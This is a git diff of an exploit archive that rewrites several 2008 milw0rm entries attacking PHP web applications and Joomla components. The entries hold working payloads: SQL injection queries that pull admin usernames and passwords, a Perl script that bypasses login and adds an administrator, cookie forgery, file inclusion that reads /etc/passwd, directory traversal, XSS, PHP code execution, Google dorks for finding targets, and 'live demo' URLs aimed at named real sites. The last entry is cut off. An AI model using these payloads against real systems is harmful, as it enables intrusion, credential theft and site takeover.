@@ -1,55 +1,55 @@ -[o]------------------------------------------------------------------------------------[x] - | Local File Inclusion Vulnerability | -[o]------------------------------------------------------------------------------------[o] - | Software : RWCards 3.0.11 Component for Joomla 1.5 CMS | - | Vendor : http://www.weberr.de/ | - | Date : 23 October 2008 | - | Author : Vrs-hCk | - | Contact : d00r[at]telkom[dot]net | -[o]------------------------------------------------------------------------------------[o] - -[»] Google Dork - - inurl:com_rwcards - -[»] Vulnerable - - ./components/com_rwcards/captcha/captcha_image.php - - 15: if (!empty( $_GET['img'] ) ) - 16: $img = $_GET['img']; - 17: else - 18: { - 19: echo 'no image file specified via &img=...'; - 20: exit; - 21: } - 22: - 23: if (!$fh = fopen( $tmp_dir_path.'cap_'.$img.'.jpg', 'rb')) - 24: { - 25: echo 'could not open image file!'; - 26: } - 27: else - 28: { - 29: fpassthru( $fh ); - 30: fclose( $fh ); - 31: } - -[»] Exploit - - http://[site]/[path]/components/com_rwcards/captcha/captcha_image.php?img=[LFI]%00 - -[»] Proof of Concept - - http://www.abcdobebe.com/components/com_rwcards/captcha/captcha_image.php?img=[LFI]%00 - http://www.whiskynet.co.uk/components/com_rwcards/captcha/captcha_image.php?img=[LFI]%00 - -[o]------------------------------------------------------------------------------------[x] - | Greetz | -[o]------------------------------------------------------------------------------------[o] - | All Member oF MainHack BrotherHood - www.MainHack.com - www.ServerIsDown.org | - | Paman, OoN_Boy, NoGe, Fluzy, H312Y, s3t4n, Angela Chang, IrcMafia, }^-^{, em|nem, | - | loqsa, pizzyroot, xx_user, ^Bradley, ayulina, MaDOnk, nTc, terbang_melayang, | - | chawanua, bl4Ck_3n91n3, R3V4N_B4ST4RD, dkk ... c0li.m0de.0n !!! 
| -[o]------------------------------------------------------------------------------------[o] - -# milw0rm.com [2008-10-23] +[o]------------------------------------------------------------------------------------[x] + | Local File Inclusion Vulnerability | +[o]------------------------------------------------------------------------------------[o] + | Software : RWCards 3.0.11 Component for Joomla 1.5 CMS | + | Vendor : http://www.weberr.de/ | + | Date : 23 October 2008 | + | Author : Vrs-hCk | + | Contact : d00r[at]telkom[dot]net | +[o]------------------------------------------------------------------------------------[o] + +[»] Google Dork + + inurl:com_rwcards + +[»] Vulnerable + + ./components/com_rwcards/captcha/captcha_image.php + + 15: if (!empty( $_GET['img'] ) ) + 16: $img = $_GET['img']; + 17: else + 18: { + 19: echo 'no image file specified via &img=...'; + 20: exit; + 21: } + 22: + 23: if (!$fh = fopen( $tmp_dir_path.'cap_'.$img.'.jpg', 'rb')) + 24: { + 25: echo 'could not open image file!'; + 26: } + 27: else + 28: { + 29: fpassthru( $fh ); + 30: fclose( $fh ); + 31: } + +[»] Exploit + + http://[site]/[path]/components/com_rwcards/captcha/captcha_image.php?img=[LFI]%00 + +[»] Proof of Concept + + http://www.abcdobebe.com/components/com_rwcards/captcha/captcha_image.php?img=[LFI]%00 + http://www.whiskynet.co.uk/components/com_rwcards/captcha/captcha_image.php?img=[LFI]%00 + +[o]------------------------------------------------------------------------------------[x] + | Greetz | +[o]------------------------------------------------------------------------------------[o] + | All Member oF MainHack BrotherHood - www.MainHack.com - www.ServerIsDown.org | + | Paman, OoN_Boy, NoGe, Fluzy, H312Y, s3t4n, Angela Chang, IrcMafia, }^-^{, em|nem, | + | loqsa, pizzyroot, xx_user, ^Bradley, ayulina, MaDOnk, nTc, terbang_melayang, | + | chawanua, bl4Ck_3n91n3, R3V4N_B4ST4RD, dkk ... c0li.m0de.0n !!! 
| +[o]------------------------------------------------------------------------------------[o] + +# milw0rm.com [2008-10-23] diff --git a/platforms/php/webapps/6818.txt b/platforms/php/webapps/6818.txt index 2fe4b6f5b..a928d9635 100755 --- a/platforms/php/webapps/6818.txt +++ b/platforms/php/webapps/6818.txt @@ -1,36 +1,36 @@ -# aflog 1.01 Multiple Insecure Cookie Handling Vulnerabilies -# url: http://www.aflog.org/download.php -# -# Author: JosS -# mail: sys-project[at]hotmail[dot]com -# site: http://spanish-hackers.com -# team: Spanish Hackers Team - [SHT] -# -# This was written for educational purpose. Use it at your own risk. -# Author will be not responsible for any damage. - -vuln file: /edit_delete.php -vuln code: -15: if($_COOKIE['aflog_auth_a']=="O" || $_COOKIE['aflog_auth_a']=="A"){ -xx: .. ---> :P -33: } -34: } else { -35: echo "
     ERROR!
    You do not have access to this page. You must be Signed In as -36: an Admin.

    "; -37: echo "
    Home | Sign In
    ": -38: } - -exploit: javascript:document.cookie = "aflog_auth_a=0; path=/"; document.cookie = "aflog_auth_a=A; path=/"; -and enters: /edit_delete.php?id=1 --> POST ID!! ---- -vuln files: -edit_cat.php -edit_lock.php -edit_form.php -...more? - -dork: "powered by aflog" - -Hack0wn :D - -# milw0rm.com [2008-10-23] +# aflog 1.01 Multiple Insecure Cookie Handling Vulnerabilies +# url: http://www.aflog.org/download.php +# +# Author: JosS +# mail: sys-project[at]hotmail[dot]com +# site: http://spanish-hackers.com +# team: Spanish Hackers Team - [SHT] +# +# This was written for educational purpose. Use it at your own risk. +# Author will be not responsible for any damage. + +vuln file: /edit_delete.php +vuln code: +15: if($_COOKIE['aflog_auth_a']=="O" || $_COOKIE['aflog_auth_a']=="A"){ +xx: .. ---> :P +33: } +34: } else { +35: echo "
     ERROR!
    You do not have access to this page. You must be Signed In as +36: an Admin.

    "; +37: echo "
    Home | Sign In
    ": +38: } + +exploit: javascript:document.cookie = "aflog_auth_a=0; path=/"; document.cookie = "aflog_auth_a=A; path=/"; +and enters: /edit_delete.php?id=1 --> POST ID!! +--- +vuln files: +edit_cat.php +edit_lock.php +edit_form.php +...more? + +dork: "powered by aflog" + +Hack0wn :D + +# milw0rm.com [2008-10-23] diff --git a/platforms/php/webapps/6819.txt b/platforms/php/webapps/6819.txt index 871ee8d23..e230ed83c 100755 --- a/platforms/php/webapps/6819.txt +++ b/platforms/php/webapps/6819.txt 
@@ -1,47 +1,47 @@ -================================================================================== - MindDezign Photo Gallery 2.2 (index.php id) Remote SQL Injection Vulnerability -================================================================================== - - ,--^----------,--------,-----,-------^--, - | ||||||||| `--------' | O .. CWH Underground .. - `+---------------------------^----------| - `\_,-------, _________________________| - / XXXXXX /`| / - / XXXXXX / `\ / - / XXXXXX /\______( - / XXXXXX / - / XXXXXX / - (________( - `------' - -AUTHOR : CWH Underground -DATE : 23 October 2008 -SITE : cwh.citec.us - - -##################################################### -APPLICATION : MindDezign Photo Gallery -VERSION : 2.2 -DOWNLOAD : http://gallery.minddezign.com/?module=download -##################################################### - ---- Remote SQL Injection --- - -** Magic Quote must turn off ** - - -[+] Vulnerable in index.php (id) - ---------- - Exploit ---------- - -[+] http://[target]/[gallery_path]/index.php?module=gallery&action=info&cate_id=1&id=-9999'+union+select+1,2,3,4,5,6,7,8,concat(gal_admin_username,0x3a3a,gal_admin_password),10+from+gallery_admin-- - - -####################################################################################### -Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK -Special Thx : asylu3, str0ke, citec.us, milw0rm.com -####################################################################################### - -# milw0rm.com [2008-10-23] +================================================================================== + MindDezign Photo Gallery 2.2 (index.php id) Remote SQL Injection Vulnerability +================================================================================== + + ,--^----------,--------,-----,-------^--, + | ||||||||| `--------' | O .. CWH Underground .. 
+ `+---------------------------^----------| + `\_,-------, _________________________| + / XXXXXX /`| / + / XXXXXX / `\ / + / XXXXXX /\______( + / XXXXXX / + / XXXXXX / + (________( + `------' + +AUTHOR : CWH Underground +DATE : 23 October 2008 +SITE : cwh.citec.us + + +##################################################### +APPLICATION : MindDezign Photo Gallery +VERSION : 2.2 +DOWNLOAD : http://gallery.minddezign.com/?module=download +##################################################### + +--- Remote SQL Injection --- + +** Magic Quote must turn off ** + + +[+] Vulnerable in index.php (id) + +--------- + Exploit +--------- + +[+] http://[target]/[gallery_path]/index.php?module=gallery&action=info&cate_id=1&id=-9999'+union+select+1,2,3,4,5,6,7,8,concat(gal_admin_username,0x3a3a,gal_admin_password),10+from+gallery_admin-- + + +####################################################################################### +Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK +Special Thx : asylu3, str0ke, citec.us, milw0rm.com +####################################################################################### + +# milw0rm.com [2008-10-23] diff --git a/platforms/php/webapps/6820.pl b/platforms/php/webapps/6820.pl index 550b82cdd..d6c34caf2 100755 --- a/platforms/php/webapps/6820.pl +++ b/platforms/php/webapps/6820.pl 
@@ -1,115 +1,115 @@ -#!/usr/bin/perl -#============================================================= -# MindDezign Photo 2.2 Gallery Arbitrary Add Admin Exploit -#============================================================= -# ,--^----------,--------,-----,-------^--, -# | ||||||||| `--------' | O .. CWH Underground .. -# `+---------------------------^----------| -# `\_,-------, _________________________| -# / XXXXXX /`| / -# / XXXXXX / `\ / -# / XXXXXX /\______( -# / XXXXXX / -# / XXXXXX / -# (________( -# `------' -# -#AUTHOR : CWH Underground -#DATE : 23 October 2008 -#SITE : cwh.citec.us -# -# -##################################################### -#APPLICATION : MindDezign Photo Gallery -#VERSION : 2.2 -#DOWNLOAD : http://gallery.minddezign.com/?module=download -##################################################### -# -#Note: magic_quotes_gpc = off -# -#This Exploit will Add user to Administrator's Privilege. -# -####################################################################################### -#Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK -#Special Thx : asylu3, str0ke, citec.us, milw0rm.com -####################################################################################### - -use LWP; -use HTTP::Request; -use HTTP::Cookies; - -print "\n==================================================\n"; -print " MindDezign Photo Arbitrary Add Admin Exploit \n"; -print " \n"; -print " Discovered By CWH Underground \n"; -print "==================================================\n"; -print " \n"; -print " ,--^----------,--------,-----,-------^--, \n"; -print " | ||||||||| `--------' | O \n"; -print " `+---------------------------^----------| \n"; -print " `\_,-------, _________________________| \n"; -print " / XXXXXX /`| / \n"; -print " / XXXXXX / `\ / \n"; -print " / XXXXXX /\______( \n"; -print " / XXXXXX / \n"; -print " / XXXXXX / .. CWH Underground .. 
\n"; -print " (________( \n"; -print " `------' \n"; -print " \n"; - -if ($#ARGV + 1 != 3) -{ - print "Usage: ./xpl.pl \n"; - print "Ex. ./xpl.pl http://www.target.com/gallery/ cwhuser cwhpass\n"; - exit(); -} - -$blogurl = $ARGV[0]; -$user = $ARGV[1]; -$pass = $ARGV[2]; - -$loginurl = $blogurl."?module=admin&action=login&task=login"; -$adduserurl = $blogurl."?module=admin&action=account&task=edit"; -$post_content = "username=".$user."&password=".$pass."&confirm_pass=".$pass."&btn_submit=Submit"; - - -print "\n..::Login Page URL::..\n"; -print "$loginurl\n"; -print "\n..::Add User Page URL::..\n"; -print "$adduserurl\n\n"; -print "..::Login Process::..\n"; - -$ua = LWP::UserAgent->new; -$ua->cookie_jar(HTTP::Cookies->new); -$request = HTTP::Request->new (POST => $loginurl); -$request->header (Accept-Charset => 'ISO-8859-1,utf-8;q=0.7,*;q=0.7'); -$request->content_type ('application/x-www-form-urlencoded'); -$request->content ('username=admin\'+or+\'a\'=\'&password=a&btn_submit=Submit'); -$response = $ua->request($request); -$location = $response -> header('Location'); - -print "\n[+]Result :: "; - -if ($location =~ /gallery_item_list/) -{ - print "Login Success!!!\n"; -} -else -{ - print "Login Failed!!!\n"; - exit(); -} - -print "\n..::Add Admin Exploit::..\n"; -$request = HTTP::Request->new (POST => $adduserurl); -$request->content_type ('application/x-www-form-urlencoded'); -$request->content ($post_content); -$response = $ua->request($request); - - print "\n[+]Result\n"; - print "Username :: ".$user."\n"; - print "Password :: ".$pass."\n"; - print "Role :: Administrator\n"; - print "\nEnjoy with Bugs ;)" - -# milw0rm.com [2008-10-23] +#!/usr/bin/perl +#============================================================= +# MindDezign Photo 2.2 Gallery Arbitrary Add Admin Exploit +#============================================================= +# ,--^----------,--------,-----,-------^--, +# | ||||||||| `--------' | O .. CWH Underground .. 
+# `+---------------------------^----------| +# `\_,-------, _________________________| +# / XXXXXX /`| / +# / XXXXXX / `\ / +# / XXXXXX /\______( +# / XXXXXX / +# / XXXXXX / +# (________( +# `------' +# +#AUTHOR : CWH Underground +#DATE : 23 October 2008 +#SITE : cwh.citec.us +# +# +##################################################### +#APPLICATION : MindDezign Photo Gallery +#VERSION : 2.2 +#DOWNLOAD : http://gallery.minddezign.com/?module=download +##################################################### +# +#Note: magic_quotes_gpc = off +# +#This Exploit will Add user to Administrator's Privilege. +# +####################################################################################### +#Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK +#Special Thx : asylu3, str0ke, citec.us, milw0rm.com +####################################################################################### + +use LWP; +use HTTP::Request; +use HTTP::Cookies; + +print "\n==================================================\n"; +print " MindDezign Photo Arbitrary Add Admin Exploit \n"; +print " \n"; +print " Discovered By CWH Underground \n"; +print "==================================================\n"; +print " \n"; +print " ,--^----------,--------,-----,-------^--, \n"; +print " | ||||||||| `--------' | O \n"; +print " `+---------------------------^----------| \n"; +print " `\_,-------, _________________________| \n"; +print " / XXXXXX /`| / \n"; +print " / XXXXXX / `\ / \n"; +print " / XXXXXX /\______( \n"; +print " / XXXXXX / \n"; +print " / XXXXXX / .. CWH Underground .. \n"; +print " (________( \n"; +print " `------' \n"; +print " \n"; + +if ($#ARGV + 1 != 3) +{ + print "Usage: ./xpl.pl \n"; + print "Ex. 
./xpl.pl http://www.target.com/gallery/ cwhuser cwhpass\n"; + exit(); +} + +$blogurl = $ARGV[0]; +$user = $ARGV[1]; +$pass = $ARGV[2]; + +$loginurl = $blogurl."?module=admin&action=login&task=login"; +$adduserurl = $blogurl."?module=admin&action=account&task=edit"; +$post_content = "username=".$user."&password=".$pass."&confirm_pass=".$pass."&btn_submit=Submit"; + + +print "\n..::Login Page URL::..\n"; +print "$loginurl\n"; +print "\n..::Add User Page URL::..\n"; +print "$adduserurl\n\n"; +print "..::Login Process::..\n"; + +$ua = LWP::UserAgent->new; +$ua->cookie_jar(HTTP::Cookies->new); +$request = HTTP::Request->new (POST => $loginurl); +$request->header (Accept-Charset => 'ISO-8859-1,utf-8;q=0.7,*;q=0.7'); +$request->content_type ('application/x-www-form-urlencoded'); +$request->content ('username=admin\'+or+\'a\'=\'&password=a&btn_submit=Submit'); +$response = $ua->request($request); +$location = $response -> header('Location'); + +print "\n[+]Result :: "; + +if ($location =~ /gallery_item_list/) +{ + print "Login Success!!!\n"; +} +else +{ + print "Login Failed!!!\n"; + exit(); +} + +print "\n..::Add Admin Exploit::..\n"; +$request = HTTP::Request->new (POST => $adduserurl); +$request->content_type ('application/x-www-form-urlencoded'); +$request->content ($post_content); +$response = $ua->request($request); + + print "\n[+]Result\n"; + print "Username :: ".$user."\n"; + print "Password :: ".$pass."\n"; + print "Role :: Administrator\n"; + print "\nEnjoy with Bugs ;)" + +# milw0rm.com [2008-10-23] diff --git a/platforms/php/webapps/6821.txt b/platforms/php/webapps/6821.txt index 1eedf851d..305133601 100755 --- a/platforms/php/webapps/6821.txt +++ b/platforms/php/webapps/6821.txt 
@@ -1,17 +1,17 @@ -/* - - miniPortail <= 2.2 (XSS/LFI) Remote Vulnerabilities - ------------------------------------------------------- - By StAkeR - StAkeR[at]hotmail[dot]it - http://www.easy-script.com/scripts-dl/miniportail.zip - ------------------------------------------------------- - - -1 Local File Inclusion - - search.php?lng=../../../../../../etc/passwd%00 - - -2 Cross Site Scritping (POST) - - search.php () - -*/ - -# milw0rm.com [2008-10-23] +/* + + miniPortail <= 2.2 (XSS/LFI) Remote Vulnerabilities + ------------------------------------------------------- + By StAkeR - StAkeR[at]hotmail[dot]it + http://www.easy-script.com/scripts-dl/miniportail.zip + ------------------------------------------------------- + + -1 Local File Inclusion + - search.php?lng=../../../../../../etc/passwd%00 + + -2 Cross Site Scritping (POST) + - search.php () + +*/ + +# milw0rm.com [2008-10-23] diff --git a/platforms/php/webapps/6822.txt b/platforms/php/webapps/6822.txt index cbec77744..64c4ef480 100755 --- a/platforms/php/webapps/6822.txt +++ b/platforms/php/webapps/6822.txt 
@@ -1,88 +1,88 @@ - WebSVN <= 2.0 Multiple Vulnerabilities - -October 20, 2008 -Vendor : Tim Armes -URL : http://websvn.tigris.org -Version : WebSVN <= 2.0 -Risk : Multiple Vulnerabilities - -Description: -WebSVN is an online SVN repository viewer. The description taken from -the project website reads "WebSVN offers a view onto your subversion -repositories that's been designed to reflect the Subversion methodology. -You can view the log of any file or directory and see a list of all the -files changed, added or deleted in any given revision. You can also view -the differences between 2 versions of a file so as to see exactly what -was changed in a particular revision." Unfortunately there are a several -issues in WebSVN may allow for an attacker to conduct cross site -scripting attacks, and create arbitrary files. There is also a code -execution issue in the v1 branch. - -Cross Site Scripting -There is a Cross Site Scripting issue in WebSVN due to the unsafe usage -of the PHP_SELF server variable within the getParameterisedSelfUrl() -function. - -/index.php/"> - -A url like the one above would display a JavaScript alert window -containing the cookie data of any set cookies for the domain. - -File Handling Issues: -There are some file handling issues in the RSS functionality used by -WebSVN. The issue is caused by the following bit of code taken from -rss.php, and allows arbitrary file operations to be executed. - -// Cachename reflecting full path to and rev for rssfeed. Must end with xml to work -$cachename = strtr(getFullURL($listurl), ":/\\?", "____"); -$cachename = $locwebsvnreal.DIRECTORY_SEPARATOR.'cache'.DIRECTORY_SEPARATOR. -$cachename.@$_REQUEST['rev'].'_rssfeed.xml'; - -As we can see from the above bit of code, the "rev" request variable is -never properly sanitized. in order to exploit this issue an attacker -would have to first send a valid "rev" parameter to rss.php, and then -traverse the known location. 
- -/rss.php?rev=1_rssfeed.xml/../test.php%00 - -So, if the "rev" parameter was initially set to the number one, then to -create a file called test.php in the root web directory a request like -the one above would have to be made. - -PHP Code Execution: -There is an arbitrary php code execution issue in the 1.* branch of -WebSVN due to the unsafe use of preg_replace evaluation when parsing -anchor tags and the like. - -// Replace any usernames -$ret = preg_replace("#\[:nom:([^\]]*)\]#e", - "username(0, trim(\"\\1\"))", - $ret); - - -The above code can be found within the create_anchors() function located -in the utils.inc file. Since this function uses double quotes, instead -of single quotes in the evaluated code, php code execution is possible -via complex variable evaluation. - -[:nom:{${phpinfo()}}] - -Even though this is not the current version, there is still many 1.* -installations being used as seen in the search below. - -http://www.google.com/search?q=%22powered+by+websvn+v1*%22 - -Solution: -Unfortunately the developers have been mostly unresponsive to any -correspondence. The original bug report filed over a month ago can be -found at the link below. - -http://websvn.tigris.org/issues/show_bug.cgi?id=179 - -Even before this bug report was filed, any attempts made to contact the developers were unsuccessful. - - -Credits: -James Bercegay of the GulfTech Security Research Team - -# milw0rm.com [2008-10-23] + WebSVN <= 2.0 Multiple Vulnerabilities + +October 20, 2008 +Vendor : Tim Armes +URL : http://websvn.tigris.org +Version : WebSVN <= 2.0 +Risk : Multiple Vulnerabilities + +Description: +WebSVN is an online SVN repository viewer. The description taken from +the project website reads "WebSVN offers a view onto your subversion +repositories that's been designed to reflect the Subversion methodology. +You can view the log of any file or directory and see a list of all the +files changed, added or deleted in any given revision. 
You can also view +the differences between 2 versions of a file so as to see exactly what +was changed in a particular revision." Unfortunately there are a several +issues in WebSVN may allow for an attacker to conduct cross site +scripting attacks, and create arbitrary files. There is also a code +execution issue in the v1 branch. + +Cross Site Scripting +There is a Cross Site Scripting issue in WebSVN due to the unsafe usage +of the PHP_SELF server variable within the getParameterisedSelfUrl() +function. + +/index.php/"> + +A url like the one above would display a JavaScript alert window +containing the cookie data of any set cookies for the domain. + +File Handling Issues: +There are some file handling issues in the RSS functionality used by +WebSVN. The issue is caused by the following bit of code taken from +rss.php, and allows arbitrary file operations to be executed. + +// Cachename reflecting full path to and rev for rssfeed. Must end with xml to work +$cachename = strtr(getFullURL($listurl), ":/\\?", "____"); +$cachename = $locwebsvnreal.DIRECTORY_SEPARATOR.'cache'.DIRECTORY_SEPARATOR. +$cachename.@$_REQUEST['rev'].'_rssfeed.xml'; + +As we can see from the above bit of code, the "rev" request variable is +never properly sanitized. in order to exploit this issue an attacker +would have to first send a valid "rev" parameter to rss.php, and then +traverse the known location. + +/rss.php?rev=1_rssfeed.xml/../test.php%00 + +So, if the "rev" parameter was initially set to the number one, then to +create a file called test.php in the root web directory a request like +the one above would have to be made. + +PHP Code Execution: +There is an arbitrary php code execution issue in the 1.* branch of +WebSVN due to the unsafe use of preg_replace evaluation when parsing +anchor tags and the like. 
+ +// Replace any usernames +$ret = preg_replace("#\[:nom:([^\]]*)\]#e", + "username(0, trim(\"\\1\"))", + $ret); + + +The above code can be found within the create_anchors() function located +in the utils.inc file. Since this function uses double quotes, instead +of single quotes in the evaluated code, php code execution is possible +via complex variable evaluation. + +[:nom:{${phpinfo()}}] + +Even though this is not the current version, there is still many 1.* +installations being used as seen in the search below. + +http://www.google.com/search?q=%22powered+by+websvn+v1*%22 + +Solution: +Unfortunately the developers have been mostly unresponsive to any +correspondence. The original bug report filed over a month ago can be +found at the link below. + +http://websvn.tigris.org/issues/show_bug.cgi?id=179 + +Even before this bug report was filed, any attempts made to contact the developers were unsuccessful. + + +Credits: +James Bercegay of the GulfTech Security Research Team + +# milw0rm.com [2008-10-23] diff --git a/platforms/php/webapps/6823.txt b/platforms/php/webapps/6823.txt index 32e10e109..65d7c51b8 100755 --- a/platforms/php/webapps/6823.txt +++ b/platforms/php/webapps/6823.txt 
@@ -1,27 +1,27 @@ -SiteEngine 5.x Multiple Remote Vulnerabilities -Due to incorrect use of intval function, leading to the logic of inspection parameters can be bypassed, resulting in SQL injection vulnerability. - --=0x01=- SQL injection Vulnerability -vul code like this: -if ( intval( $id ) ) -{ - require_once( $site_engine_root."lib/rss.php" ); -$sql = "SELECT url FROM ".$tablepre."feed WHERE id={$id} AND uploader='{$SESSION['uid']}'"; - -POC: -http://www.test.com/announcements.php?id=1%bf%27%20and%201=2%20%20UNION%20select%201,2,user(),4,5,6,7,8,9,10,11%20/* -This vulnerability exist in board.php too…… - --=0x02=- URI Redirection Vulnerability -POC: -http://www.test.com/api.php?action=logout&forward=http://evil.com - --=0x03=- Information Disclosure Vulnerability -POC: -http://www.test.com/misc.php?action=php_info - -ForFun~ - --=EOF=- - -# milw0rm.com [2008-10-23] +SiteEngine 5.x Multiple Remote Vulnerabilities +Due to incorrect use of intval function, leading to the logic of inspection parameters can be bypassed, resulting in SQL injection vulnerability. + +-=0x01=- SQL injection Vulnerability +vul code like this: +if ( intval( $id ) ) +{ + require_once( $site_engine_root."lib/rss.php" ); +$sql = "SELECT url FROM ".$tablepre."feed WHERE id={$id} AND uploader='{$SESSION['uid']}'"; + +POC: +http://www.test.com/announcements.php?id=1%bf%27%20and%201=2%20%20UNION%20select%201,2,user(),4,5,6,7,8,9,10,11%20/* +This vulnerability exist in board.php too…… + +-=0x02=- URI Redirection Vulnerability +POC: +http://www.test.com/api.php?action=logout&forward=http://evil.com + +-=0x03=- Information Disclosure Vulnerability +POC: +http://www.test.com/misc.php?action=php_info + +ForFun~ + +-=EOF=- + +# milw0rm.com [2008-10-23] diff --git a/platforms/php/webapps/6826.txt b/platforms/php/webapps/6826.txt index 19fac35a0..a4d9d1503 100755 --- a/platforms/php/webapps/6826.txt +++ b/platforms/php/webapps/6826.txt 
@@ -1,42 +1,42 @@ -############################################################################# -# # -# Joomla Component Archaic Binary Gallery Directory Traversal Vulnerability # -# # -############################################################################# - - -######################################## - -[~] Vulnerability found by: H!tm@N -[~] Contact: hitman[at]khg-crew[dot]ws -[~] Site: www.khg-crew.ws -[~] Greetz: boom3rang, KHG, urtan, war_ning, chs, redc00de - [-=Kosova Hackers Group=-] - -######################################## - -[~] ScriptName: "Joomla" -[~] Component: "Archaic Binary Gallery (com_ab_gallery)" -[~] Version: "1.0" -[~] Author: "Zharvek" -[~] Author E-mail: "zharvek@archaicbinary.net" -[~] Author URL: "www.archaicbinary.net" - -######################################## - -[~] Exploit: /index.php?option=com_ab_gallery&Itemid=37&gallery=[Directory] - -[~] Example: /index.php?option=com_ab_gallery&Itemid=37&gallery=/../../ - -######################################## - -[~] Live Demo: http://gsegyview.sourceforge.net/index.php?option=com_ab_gallery&Itemid=37&gallery=/../../ - -######################################## - -[~] Proud 2 be Albanian -[~] Proud 2 be Muslim -[~] United States of Albania - -######################################## - -# milw0rm.com [2008-10-24] +############################################################################# +# # +# Joomla Component Archaic Binary Gallery Directory Traversal Vulnerability # +# # +############################################################################# + + +######################################## + +[~] Vulnerability found by: H!tm@N +[~] Contact: hitman[at]khg-crew[dot]ws +[~] Site: www.khg-crew.ws +[~] Greetz: boom3rang, KHG, urtan, war_ning, chs, redc00de - [-=Kosova Hackers Group=-] + +######################################## + +[~] ScriptName: "Joomla" +[~] Component: "Archaic Binary Gallery (com_ab_gallery)" +[~] Version: "1.0" +[~] Author: "Zharvek" +[~] Author E-mail: 
"zharvek@archaicbinary.net" +[~] Author URL: "www.archaicbinary.net" + +######################################## + +[~] Exploit: /index.php?option=com_ab_gallery&Itemid=37&gallery=[Directory] + +[~] Example: /index.php?option=com_ab_gallery&Itemid=37&gallery=/../../ + +######################################## + +[~] Live Demo: http://gsegyview.sourceforge.net/index.php?option=com_ab_gallery&Itemid=37&gallery=/../../ + +######################################## + +[~] Proud 2 be Albanian +[~] Proud 2 be Muslim +[~] United States of Albania + +######################################## + +# milw0rm.com [2008-10-24] diff --git a/platforms/php/webapps/6827.txt b/platforms/php/webapps/6827.txt index 2dffd88f9..628b15444 100755 --- a/platforms/php/webapps/6827.txt +++ b/platforms/php/webapps/6827.txt 
@@ -1,43 +1,43 @@ -############################################################################# -# # -# Joomla Component Kbase SQL Injection Vulnerability # -# # -############################################################################# - - -######################################## - -[~] Vulnerability found by: H!tm@N -[~] Contact: hitman[at]khg-crew[dot]ws -[~] Site: www.khg-crew.ws -[~] Greetz: boom3rang, KHG, urtan, war_ning, chs, redc00de - [-=Kosova Hackers Group=-] - -######################################## - -[~] ScriptName: "Joomla" -[~] Component: "Kbase (com_kbase)" -[~] Version: "1.2" -[~] Date: "?.?.2008" -[~] Author: "John Messingham Development Services" -[~] Author E-mail: "mail@jmds.eu" -[~] Author URL: "www.jmds.eu" - -######################################## - -[~] Exploit: /index.php?option=com_kbase&view=article&id=[SQL] - -[~] Example: /index.php?option=com_kbase&view=article&id=-1+union+select+1,concat(username,char(58),password)KHG,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+jos_users-- - -######################################## - -[~] Live Demo: http://netserv.ncesd.org/index.php?option=com_kbase&view=article&id=-1+union+select+1,concat(username,char(58),password)KHG,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+jos_users-- - -######################################## - -[~] Proud 2 be Albanian -[~] Proud 2 be Muslim -[~] United States of Albania - -######################################## - -# milw0rm.com [2008-10-24] +############################################################################# +# # +# Joomla Component Kbase SQL Injection Vulnerability # +# # +############################################################################# + + +######################################## + +[~] Vulnerability found by: H!tm@N +[~] Contact: hitman[at]khg-crew[dot]ws +[~] Site: www.khg-crew.ws +[~] Greetz: boom3rang, KHG, urtan, war_ning, chs, redc00de - [-=Kosova Hackers Group=-] + +######################################## + +[~] 
ScriptName: "Joomla" +[~] Component: "Kbase (com_kbase)" +[~] Version: "1.2" +[~] Date: "?.?.2008" +[~] Author: "John Messingham Development Services" +[~] Author E-mail: "mail@jmds.eu" +[~] Author URL: "www.jmds.eu" + +######################################## + +[~] Exploit: /index.php?option=com_kbase&view=article&id=[SQL] + +[~] Example: /index.php?option=com_kbase&view=article&id=-1+union+select+1,concat(username,char(58),password)KHG,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+jos_users-- + +######################################## + +[~] Live Demo: http://netserv.ncesd.org/index.php?option=com_kbase&view=article&id=-1+union+select+1,concat(username,char(58),password)KHG,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+jos_users-- + +######################################## + +[~] Proud 2 be Albanian +[~] Proud 2 be Muslim +[~] United States of Albania + +######################################## + +# milw0rm.com [2008-10-24] diff --git a/platforms/php/webapps/6829.txt b/platforms/php/webapps/6829.txt index 77ee951b0..b3a071854 100755 --- a/platforms/php/webapps/6829.txt +++ b/platforms/php/webapps/6829.txt 
@@ -1,47 +1,47 @@ -================================================================================================================== - SSSSS NN N AA K K EEEEE SSSSS TTTTTTTTT EEEEE AA MM MM - S N N N A A K K E S T E A A M M M M - SSSSS N N N AAAAAA KKK EEEEE SSSSS T EEEEE AAAAAA M M M M - S N N N A A K K E S T E A A M M M - SSSSS N NN A A K K EEEEE SSSSS T EEEEE A A M M -===================================================SNAKES TEAM==================================================== -+ = -= AJ Forced Matrix Script Remote SQL Injection Vulnerability + -+ = -==============================================:::ALGERIAN HaCkEr:::=============================================== - = = = = - = = Discovered By: yassine_enp :::ALGERIAN HaCkEr::: = = - = = - = = ************ ::::::home : www.snakespc.com/sc::::::*************** = = - = = - = = :::::Mail: e1np@hotmail.com::::::: = = - = = - = = ::::script Demo: http://www.ajsquare.com/resources/rss_reader/::::= = - = nome de script :rss_reader - = - ======================================yassine_enp=================================== - - -Exploit(1): -******** - -www.sit.com/[script_path]/EditUrl.php?url=-7+union+select+1,password,3,username+from+admin-- - -Demo -________ - -http://www.ajsquare.com/resources/rss_reader/EditUrl.php?url=-7+union+select+1,password,3,username+from+admin-- - - - - - -=================================================================================================================== - -Mr.HCOCA_MAN:::DrEaDFuL:::super cristal:::His0k4:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALL www.Snakespc.com/SC >>>> Members - -=================================================================================================================== - - ::::e1np@Hotmail.CoM:::: - -# milw0rm.com [2008-10-24] +================================================================================================================== + SSSSS NN N AA K K EEEEE SSSSS TTTTTTTTT EEEEE AA MM MM + S N N N A A K K E S T E A A M M M M + 
